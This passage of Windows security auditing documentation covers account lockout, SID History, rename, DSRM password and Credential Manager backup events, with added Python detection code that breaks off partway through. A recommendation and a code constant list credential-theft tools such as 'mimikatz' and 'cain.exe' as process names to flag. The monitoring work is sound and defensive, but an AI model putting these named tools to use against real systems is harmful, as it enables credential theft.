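    enabled, disabled = uac_changes(int(d["OldUacValue"], 16), int(d["NewUacValue"], 16))
    for key in [(n, True) for n in enabled] + [(n, False) for n in disabled]:
        if key in ALERT_TRANSITIONS:
            findings.append(ALERT_TRANSITIONS[key])
    if d["PrimaryGroupId"] not in ("-", "513"):   # 513 is the expected primary group for users
        findings.append("Primary Group ID changed to " + d["PrimaryGroupId"])
    if d["SidHistory"] != "-":                     # only a cross-domain migration sets this
        findings.append("SID History changed")
    if d["AllowedToDelegateTo"] != "-":            # services list on the Delegation tab changed
        findings.append("AllowedToDelegateTo changed")
    return findings

# The sample 4738 event from this page, abridged to the fields the rules read.
SAMPLE_4738 = """<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System><EventID>4738</EventID></System>
<EventData>
<Data Name="TargetUserName">ksmith</Data>
<Data Name="TargetDomainName">CONTOSO</Data>
<Data Name="TargetSid">S-1-5-21-3457937927-2839227994-823803824-6609</Data>
<Data Name="PrimaryGroupId">-</Data>
<Data Name="AllowedToDelegateTo">-</Data>
<Data Name="OldUacValue">0x15</Data>
<Data Name="NewUacValue">0x211</Data>
<Data Name="SidHistory">-</Data>
</EventData></Event>"""

if __name__ == "__main__":
    print(uac_changes(0x15, 0x211))   # (['DONT_EXPIRE_PASSWORD'], ['PASSWORD_NOT_REQUIRED'])
    print(evaluate_4738(SAMPLE_4738))  # ["'Don't Expire Password' - Enabled"]
```

Because a local account reports current values in every Changed Attributes field, the XOR of the two UAC values is the one reliable signal of what changed for local accounts as well; the remaining fields are only meaningful for domain accounts, where unchanged attributes are “-”.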
4740(S): A user account was locked out.
4/5/2019 • 3 minutes to read

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit User Account Management
Event Description:
This event generates every time a user account is locked out.
For user accounts, this event generates on domain controllers, member servers, and workstations.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>4740</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>13824</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2015-08-21T22:06:08.576887500Z" />
<EventRecordID>175703</EventRecordID>
<Correlation />
<Execution ProcessID="520" ThreadID="1112" />
<Channel>Security</Channel>
<Computer>DC01.contoso.local</Computer>
<Security />
</System>
- <EventData>
<Data Name="TargetUserName">Auditor</Data>
<Data Name="TargetDomainName">WIN81</Data>
<Data Name="TargetSid">S-1-5-21-3457937927-2839227994-823803824-2104</Data>
<Data Name="SubjectUserSid">S-1-5-18</Data>
<Data Name="SubjectUserName">DC01$</Data>
<Data Name="SubjectDomainName">CONTOSO</Data>
<Data Name="SubjectLogonId">0x3e7</Data>
</EventData>
</Event>

Required Server Roles: None.
Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of account that performed the lockout operation. Event Viewer automatically
tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data in
the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security
principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain
controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that
user from the database and places it in the access token for that user. The system uses the SID in the access
token to identify the user in all subsequent interactions with Windows security. When a SID has been used as
the unique identifier for a user or group, it cannot ever be used again to identify another user or group. For
more information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that performed the lockout operation.
Account Domain [Type = UnicodeString]: domain or computer name. Formats vary, and include the
following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Account That Was Locked Out:
Security ID [Type = SID]: SID of account that was locked out. Event Viewer automatically tries to resolve
SIDs and show the account name. If the SID cannot be resolved, you will see the source data in the event.
Account Name [Type = UnicodeString]: the name of the account that was locked out.
Additional Information:
Caller Computer Name [Type = UnicodeString]: the name of the computer from which the logon attempt that
caused the lockout of the target account was received. For example: WIN81.

Security Monitoring Recommendations
For 4740(S): A user account was locked out.

Important For this event, also see Appendix A: Security monitoring recommendations for many audit events.

Because this event is typically triggered by the SYSTEM account, we recommend that you report it
whenever “Subject\Security ID” is not SYSTEM.
If you have high-value domain or local accounts (for example, domain administrator accounts) for which
you need to monitor every lockout, monitor all 4740 events with the “Account That Was Locked Out
\Security ID” values that correspond to those accounts.
If the user account “Account That Was Locked Out\Security ID” should not be used (for authentication
attempts) from the Additional Information\Caller Computer Name, then trigger an alert.
Monitor for all 4740 events where Additional Information\Caller Computer Name is not from your
domain. However, be aware that even if the computer is not in your domain you will get the computer
name instead of an IP address in the 4740 event.
4765(S): SID History was added to an account.
4/5/2019 • 2 minutes to read

Applies to
Windows 10
Windows Server 2016
This event generates when SID History was added to an account.
See more information about SID History here: https://technet.microsoft.com/library/cc779590(v=ws.10).aspx.
There is no example of this event in this document.
Subcategory: Audit User Account Management
Event Schema:
SID History was added to an account.
Subject:

Security ID:%6
Account Name:%7
Account Domain:%8
Logon ID:%9

Target Account:

Security ID:%5
Account Name:%3
Account Domain:%4

Source Account:

Security ID:%2
Account Name:%1

Additional Information:

Privileges:%10
SID List:%11

Required Server Roles: Active Directory domain controller.
Minimum OS Version: Windows Server 2008.
Event Versions: 0.
Security Monitoring Recommendations
There is no recommendation for this event in this document.
4766(F): An attempt to add SID History to an account failed.
4/5/2019 • 2 minutes to read

Applies to
Windows 10
Windows Server 2016
This event generates when an attempt to add SID History to an account failed.
See more information about SID History here: https://technet.microsoft.com/library/cc779590(v=ws.10).aspx.
There is no example of this event in this document.
Subcategory: Audit User Account Management
Event Schema:
An attempt to add SID History to an account failed.
Subject:

Security ID:-
Account Name:%5
Account Domain:%6
Logon ID:%7

Target Account:

Security ID:%4
Account Name:%2
Account Domain:%3

Source Account:

Account Name:%1

Additional Information:

Privileges:%8

Required Server Roles: Active Directory domain controller.
Minimum OS Version: Windows Server 2008.
Event Versions: 0.
Security Monitoring Recommendations
There is no recommendation for this event in this document.
4767(S): A user account was unlocked.
4/5/2019 • 2 minutes to read

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit User Account Management
Event Description:
This event generates every time a user account is unlocked.
For user accounts, this event generates on domain controllers, member servers, and workstations.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:

- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>4767</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>13824</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2015-08-21T22:31:01.871931700Z" />
<EventRecordID>175705</EventRecordID>
<Correlation />
<Execution ProcessID="520" ThreadID="1520" />
<Channel>Security</Channel>
<Computer>DC01.contoso.local</Computer>
<Security />
</System>
- <EventData>
<Data Name="TargetUserName">Auditor</Data>
<Data Name="TargetDomainName">CONTOSO</Data>
<Data Name="TargetSid">S-1-5-21-3457937927-2839227994-823803824-2104</Data>
<Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
<Data Name="SubjectUserName">dadmin</Data>
<Data Name="SubjectDomainName">CONTOSO</Data>
<Data Name="SubjectLogonId">0x30d5f</Data>
</EventData>
</Event>
Required Server Roles: None.
Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of account that performed the unlock operation. Event Viewer automatically
tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data in
the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security
principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain
controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user
from the database and places it in the access token for that user. The system uses the SID in the access token to
identify the user in all subsequent interactions with Windows security. When a SID has been used as the
unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more
information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that performed the unlock operation.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Target Account:
Security ID [Type = SID]: SID of account that was unlocked. Event Viewer automatically tries to resolve
SIDs and show the account name. If the SID cannot be resolved, you will see the source data in the event.
Account Name [Type = UnicodeString]: the name of the account that was unlocked.
Account Domain [Type = UnicodeString]: target account’s domain or computer name. Formats vary, and
include the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Security Monitoring Recommendations
For 4767(S): A user account was unlocked.

Important For this event, also see Appendix A: Security monitoring recommendations for many audit events.

We recommend monitoring all 4767 events for local accounts.


4780(S): The ACL was set on accounts which are members of administrators groups.
4/5/2019 • 2 minutes to read • Edit Online

Applies to
Windows 10
Windows Server 2016
Every hour, the domain controller that holds the primary domain controller (PDC) Flexible Single Master
Operation (FSMO) role compares the ACL on all security principal accounts (users, groups, and machine accounts)
present for its domain in Active Directory that are in administrative or security-sensitive groups and that
have the AdminCount attribute = 1 against the ACL on the AdminSDHolder object. If the ACL on the principal account
differs from the ACL on the AdminSDHolder object, then the ACL on the principal account is reset to match the
ACL on the AdminSDHolder object and this event is generated.
For some reason, this event doesn’t generate on some OS versions.
Subcategory: Audit User Account Management
Event Schema:
The ACL was set on accounts which are members of administrators groups.
Subject:

Security ID:%4
Account Name:%5
Account Domain:%6
Logon ID:%7

Target Account:

Security ID:%3
Account Name:%1
Account Domain:%2

Additional Information:

Privileges:%8

Required Server Roles: Active Directory domain controller.
Minimum OS Version: Windows Server 2008.
Event Versions: 0.

Security Monitoring Recommendations
Monitor for this event and investigate why the object’s ACL was changed.
4781(S): The name of an account was changed.
4/5/2019

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit User Account Management
Event Description:
This event generates every time a user or computer account name (sAMAccountName attribute) is changed.
For user accounts, this event generates on domain controllers, member servers, and workstations.
For computer accounts, this event generates only on domain controllers.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>4781</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>13824</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2015-08-22T02:41:09.737420900Z" />
<EventRecordID>175754</EventRecordID>
<Correlation />
<Execution ProcessID="520" ThreadID="1112" />
<Channel>Security</Channel>
<Computer>DC01.contoso.local</Computer>
<Security />
</System>
- <EventData>
<Data Name="OldTargetUserName">Admin</Data>
<Data Name="NewTargetUserName">MainAdmin</Data>
<Data Name="TargetDomainName">CONTOSO</Data>
<Data Name="TargetSid">S-1-5-21-3457937927-2839227994-823803824-6117</Data>
<Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
<Data Name="SubjectUserName">dadmin</Data>
<Data Name="SubjectDomainName">CONTOSO</Data>
<Data Name="SubjectLogonId">0x30d5f</Data>
<Data Name="PrivilegeList">-</Data>
</EventData>
</Event>

Required Server Roles: None.
Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of account that performed the “change account name” operation. Event Viewer
automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the
source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security
principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain
controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that
user from the database and places it in the access token for that user. The system uses the SID in the access
token to identify the user in all subsequent interactions with Windows security. When a SID has been used as
the unique identifier for a user or group, it cannot ever be used again to identify another user or group. For
more information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that performed the “change account
name” operation.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Target Account:
Security ID [Type = SID]: SID of account on which the name was changed. Event Viewer automatically
tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data
in the event.
Account Domain [Type = UnicodeString]: target account’s domain or computer name. Formats vary, and
include the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Old Account Name [Type = UnicodeString]: old name of target account.
New Account Name [Type = UnicodeString]: new name of target account.
Additional Information:
Privileges [Type = UnicodeString]: the list of user privileges which were used during the operation, for
example, SeBackupPrivilege. This parameter might not be captured in the event, and in that case appears as “-”.
See full list of user privileges in “Table 8. User Privileges.”.

Security Monitoring Recommendations
For 4781(S): The name of an account was changed.

Important For this event, also see Appendix A: Security monitoring recommendations for many audit events.

If you have high-value user or computer accounts (or local user accounts) for which you need to monitor each
change to the accounts, monitor this event with the “Target Account\Security ID” that corresponds to the
high-value accounts.
4794(S, F): An attempt was made to set the Directory Services Restore Mode administrator password.
4/5/2019

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit User Account Management
Event Description:
This event generates every time the Directory Services Restore Mode (DSRM) administrator password is changed.
This event generates only on domain controllers.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>4794</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>13824</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2015-08-18T02:49:26.087748900Z" />
<EventRecordID>172348</EventRecordID>
<Correlation />
<Execution ProcessID="520" ThreadID="2964" />
<Channel>Security</Channel>
<Computer>DC01.contoso.local</Computer>
<Security />
</System>
- <EventData>
<Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
<Data Name="SubjectUserName">dadmin</Data>
<Data Name="SubjectDomainName">CONTOSO</Data>
<Data Name="SubjectLogonId">0x36f67</Data>
<Data Name="Workstation">DC01</Data>
<Data Name="Status">0x0</Data>
</EventData>
</Event>

Required Server Roles: Active Directory domain controller.
Minimum OS Version: Windows Server 2008.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of account that made an attempt to set the Directory Services Restore Mode
administrator password. Event Viewer automatically tries to resolve SIDs and show the account name. If the
SID cannot be resolved, you will see the source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security
principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain
controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user
from the database and places it in the access token for that user. The system uses the SID in the access token to
identify the user in all subsequent interactions with Windows security. When a SID has been used as the
unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more
information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that made an attempt to set Directory
Services Restore Mode administrator password.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Additional Information:
Caller Workstation [Type = UnicodeString]: the name of the computer account from which the Directory Services
Restore Mode (DSRM) administrator password change request was received. For example: “DC01”. If the
change request was sent locally (from the same server), this field will have the same name as the computer
account.
Status Code [Type = HexInt32]: for Success events it has the “0x0” value.

Security Monitoring Recommendations
For 4794(S, F): An attempt was made to set the Directory Services Restore Mode administrator password.
Always monitor 4794 events and trigger alerts when they occur.
4798(S): A user's local group membership was enumerated.
4/5/2019

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit User Account Management
Event Description:
This event generates when a process enumerates a user's security-enabled local groups on a computer or device.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>4798</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>13824</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2015-11-12T04:14:17.436787700Z" />
<EventRecordID>691</EventRecordID>
<Correlation ActivityID="{CBAEDE08-1CF0-0000-50DE-AECBF01CD101}" />
<Execution ProcessID="744" ThreadID="3928" />
<Channel>Security</Channel>
<Computer>WIN10-1.contoso.local</Computer>
<Security />
</System>
- <EventData>
<Data Name="TargetUserName">Administrator</Data>
<Data Name="TargetDomainName">WIN10-1</Data>
<Data Name="TargetSid">S-1-5-21-1694160624-234216347-2203645164-500</Data>
<Data Name="SubjectUserSid">S-1-5-21-1377283216-344919071-3415362939-1104</Data>
<Data Name="SubjectUserName">dadmin</Data>
<Data Name="SubjectDomainName">CONTOSO</Data>
<Data Name="SubjectLogonId">0x72d9d</Data>
<Data Name="CallerProcessId">0xc80</Data>
<Data Name="CallerProcessName">C:\\Windows\\System32\\mmc.exe</Data>
</EventData>
</Event>

Required Server Roles: None.
Minimum OS Version: Windows Server 2016, Windows 10.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of account that requested the “enumerate user's security-enabled local groups”
operation. Event Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be
resolved, you will see the source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security
principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain
controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user
from the database and places it in the access token for that user. The system uses the SID in the access token to
identify the user in all subsequent interactions with Windows security. When a SID has been used as the
unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more
information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that requested the “enumerate user's
security-enabled local groups” operation.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
User:
Security ID [Type = SID]: SID of the account whose groups were enumerated. Event Viewer automatically
tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data
in the event.
Account Name [Type = UnicodeString]: the name of the account whose groups were enumerated.
Account Domain [Type = UnicodeString]: group’s domain or computer name. Formats vary, and include
the following:
For a local group, this field will contain the name of the computer to which this group belongs, for
example: “Win81”.
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
Process Information:
Process ID [Type = Pointer]: hexadecimal Process ID of the process that enumerated the members of the
group. Process ID (PID) is a number used by the operating system to uniquely identify an active process. To
see the PID for a specific process you can, for example, use Task Manager (Details tab, PID column).
If you convert the hexadecimal value to decimal, you can compare it to the values in Task Manager.

You can also correlate this process ID with a process ID in other events, for example, “4688: A new process has
been created” Process Information\New Process ID.
Process Name [Type = UnicodeString]: full path and the name of the executable for the process.

Security Monitoring Recommendations
For 4798(S): A user's local group membership was enumerated.

Important For this event, also see Appendix A: Security monitoring recommendations for many audit events.

If you have high value domain or local accounts for which you need to monitor each enumeration of their
group membership, or any access attempt, monitor events with the “Subject\Security ID” that
corresponds to the high value account or accounts.
If you have a pre-defined “Process Name” for the process reported in this event, monitor all events with
“Process Name” not equal to your defined value.
You can monitor to see if “Process Name” is not in a standard folder (for example, not in System32 or
Program Files) or is in a restricted folder (for example, Temporary Internet Files).
If you have a pre-defined list of restricted substrings or words in process names (for example, “mimikatz”
or “cain.exe”), check for these substrings in “Process Name.”
5376(S): Credential Manager credentials were backed up.
4/5/2019

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit User Account Management
Event Description:
This event generates every time the user (Subject) successfully backs up the credential manager database.
Typically this can be done by clicking “Back up Credentials” in Credential Manager in the Control Panel.
This event generates on domain controllers, member servers, and workstations.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>5376</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>13824</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2015-08-22T03:28:02.200404700Z" />
<EventRecordID>175779</EventRecordID>
<Correlation />
<Execution ProcessID="520" ThreadID="548" />
<Channel>Security</Channel>
<Computer>DC01.contoso.local</Computer>
<Security />
</System>
- <EventData>
<Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
<Data Name="SubjectUserName">dadmin</Data>
<Data Name="SubjectDomainName">CONTOSO</Data>
<Data Name="SubjectLogonId">0x30d7c</Data>
</EventData>
</Event>

Required Server Roles: None.
Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of account that performed the backup operation. Event Viewer automatically
tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data in
the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security
principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain
controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user
from the database and places it in the access token for that user. The system uses the SID in the access token to
identify the user in all subsequent interactions with Windows security. When a SID has been used as the
unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more
information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that performed the backup operation.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”

Security Monitoring Recommendations
For 5376(S): Credential Manager credentials were backed up.

Important For this event, also see Appendix A: Security monitoring recommendations for many audit events.

Every 5376 event should be recorded for all local and domain accounts, because this action (back up Credential
Manager) is very rarely used by users and can indicate a virus, or other harmful or malicious activity.
5377(S): Credential Manager credentials were restored from a backup.
4/5/2019

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit User Account Management
Event Description:
This event generates every time the user (Subject) successfully restores the credential manager database.
Typically this can be done by clicking “Restore Credentials” in Credential Manager in the Control Panel.
This event generates on domain controllers, member servers, and workstations.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>5377</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>13824</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2015-08-22T03:35:47.523266300Z" />
<EventRecordID>175780</EventRecordID>
<Correlation />
<Execution ProcessID="520" ThreadID="1236" />
<Channel>Security</Channel>
<Computer>DC01.contoso.local</Computer>
<Security />
</System>
- <EventData>
<Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
<Data Name="SubjectUserName">dadmin</Data>
<Data Name="SubjectDomainName">CONTOSO</Data>
<Data Name="SubjectLogonId">0x30d7c</Data>
</EventData>
</Event>

Required Server Roles: None.
Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of account that performed the restore operation. Event Viewer automatically
tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data in
the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security
principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain
controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user
from the database and places it in the access token for that user. The system uses the SID in the access token to
identify the user in all subsequent interactions with Windows security. When a SID has been used as the
unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more
information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that performed the restore operation.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”

Security Monitoring Recommendations
For 5377(S): Credential Manager credentials were restored from a backup.

Important For this event, also see Appendix A: Security monitoring recommendations for many audit events.

Every 5377 event should be recorded for all local and domain accounts, because this action (restore Credential
Manager credentials from a backup) is very rarely used by users, and can indicate a virus, or other harmful or
malicious activity.
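The monitoring recommendations given above for 4781, 4794, 4798, 5376 and 5377 turned into detection logic, as an added example that is not Microsoft's code: it parses records in the Event XML shape shown on this page and returns a finding for each recommendation that fires. The high-value SID list, the allowed-process list, the make_event helper and the second 4798 record are constructed for illustration; the other records reproduce the page's samples.

```python
"""Detection logic for the monitoring recommendations of 4781, 4794, 4798, 5376 and 5377.

Added example, not Microsoft's code. Watch-lists, make_event and the second
4798 record are constructed; the remaining records mirror the page's samples.
"""
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Constructed watch-lists; a deployment fills these from its own inventory.
HIGH_VALUE_SIDS = {
    "S-1-5-21-3457937927-2839227994-823803824-6117",  # "Admin" in the page's 4781 sample
}
ALLOWED_4798_PROCESSES = {"c:\\windows\\system32\\mmc.exe"}   # the pre-defined "Process Name"
STANDARD_FOLDERS = ("c:\\windows\\system32\\", "c:\\program files\\")
RESTRICTED_FOLDERS = ("\\temporary internet files\\",)
RESTRICTED_SUBSTRINGS = ("mimikatz", "cain.exe")


def parse_event(xml_text):
    """Return (EventID, {Data Name: value}) from one Security event record."""
    root = ET.fromstring(xml_text)
    event_id = int(root.find("e:System/e:EventID", NS).text)
    data = {d.get("Name"): (d.text or "") for d in root.findall("e:EventData/e:Data", NS)}
    return event_id, data


def evaluate(xml_text):
    """Apply the page's recommendations to one record; return the findings (empty = nothing to flag)."""
    event_id, d = parse_event(xml_text)
    subject = f"{d.get('SubjectDomainName', '')}\\{d.get('SubjectUserName', '')}"
    findings = []
    if event_id == 4781:
        # Monitor renames whose Target Account\Security ID is a high-value account.
        if d.get("TargetSid") in HIGH_VALUE_SIDS:
            findings.append(f"4781: high-value account renamed {d.get('OldTargetUserName')} "
                            f"-> {d.get('NewTargetUserName')} by {subject}")
    elif event_id == 4794:
        # Always alert: the DSRM administrator password was set (Status 0x0 means success).
        findings.append(f"4794: DSRM administrator password set by {subject} "
                        f"from {d.get('Workstation')} (Status {d.get('Status')})")
    elif event_id == 4798:
        # The page's sample carries doubled backslashes in the path; normalise before matching.
        proc = d.get("CallerProcessName", "").replace("\\\\", "\\").lower()
        # High-value account as the Subject (page wording) or as the User whose groups were enumerated.
        if HIGH_VALUE_SIDS & {d.get("SubjectUserSid"), d.get("TargetSid")}:
            findings.append(f"4798: high-value account involved in group enumeration by {subject}")
        if proc not in ALLOWED_4798_PROCESSES:
            findings.append(f"4798: Process Name differs from the pre-defined value: {proc}")
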